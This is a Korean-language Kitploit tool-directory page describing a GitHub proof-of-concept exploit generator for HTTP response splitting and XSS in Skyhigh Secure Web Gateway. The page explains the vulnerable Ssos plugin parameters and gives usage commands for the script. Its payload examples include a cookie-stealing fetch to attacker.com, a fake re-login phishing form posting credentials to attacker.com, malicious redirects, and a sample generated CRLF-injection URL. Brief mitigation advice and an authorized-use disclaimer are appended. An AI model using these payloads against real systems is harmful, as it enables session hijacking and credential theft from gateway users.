Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-0214 — 보안 웹 게이트웨이 10.2.11 - 교차 사이트 스크립팅 (XSS) | Kitploit
도구/GitHubGitHub/0pts/cve-2023-0214
Phishing ToolsVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0pts/cve-2023-0214

CVE-2023-0214

보안 웹 게이트웨이 10.2.11 - 교차 사이트 스크립팅 (XSS)

저장소 보기
26개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SWG 익스플로잇 생성기

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

0PTS 제작

Skyhigh Secure Web Gateway (이전 McAfee Web Gateway)의 HTTP Response Splitting 취약점에 대한 개념 증명.

취약점 정보

Skyhigh Secure Web Gateway의 HTTP Response Splitting 취약점은 원격으로 임의의 HTML/JavaScript 코드를 주입하여 XSS 공격을 수행할 수 있는 심각한 취약점입니다.

기술 세부 사항

  • 유형: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • 위험도: 높음
  • 공격 벡터: 원격, 인증 불필요

익스플로잇 작동 원리

취약점은 URL 매개변수를 올바르게 처리하지 않는 "Ssos" 플러그인(SetLoginToken 액션)에 존재합니다.

  1. "p" 매개변수 → P3P 헤더에 주입됨
  2. "c" 매개변수 → 응답 본문에 주입됨
  3. "v" 매개변수 → MwgSso 쿠키에 주입됨

줄바꿈 문자(\r\n / %0d%0a)가 이스케이프되지 않으므로 공격자는 다음을 수행할 수 있습니다:

  • 임의의 HTTP 헤더 주입
  • Content-Type 및 Content-Length 재정의
  • 임의의 HTML/JavaScript 코드 주입

브라우저는 올바르게 구성된 Content-Length 이후의 나머지 응답 내용을 무시하므로 표시되는 콘텐츠를 완전히 위조할 수 있습니다.

사용 방법

기본 실행

root@kitploit:~
python explot.py

옵션 포함 (nmap 스타일)

root@kitploit:~
# Базовый XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# Редирект
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# Фишинг форма
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# Только URL (тихий режим)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

매개변수

root@kitploit:~
-d, --domain    대상 도메인 (기본값: google.com)
-x, --prefix    URL 경로 접두사 (기본값: SWG internal path)
-p, --payload   HTML/JavaScript payload
-q, --quiet     조용한 모드 - URL만 출력
-v, --version   스크립트 버전
-h, --help      도움말

Payload 예제

쿠키 탈취 XSS

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

피싱 폼

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

악성 사이트로 리디렉션

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

데모

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Target Domain:   example.com
[+] Payload Length:  43 bytes
[+] URL Length:      234 chars

[+] Generated URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

보호 방법

  1. Skyhigh SWG를 최신 버전으로 업데이트하세요
  2. CRLF 인젝션 필터링이 있는 WAF를 사용하세요
  3. /mwg-internal/*에 대한 의심스러운 요청 모니터링

면책 조항

⚠️ 주의: 이 도구는 다음 목적으로만 사용해야 합니다:

  • 승인된 침투 테스트
  • 교육 목적
  • CTF 대회
  • 보안 연구

소유자의 명시적 허가 없이 시스템에 사용하는 것은 불법입니다.

출처

  • https://www.exploit-db.com/exploits/51237
  • Skyhigh Security 게시판

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
도구 다운로드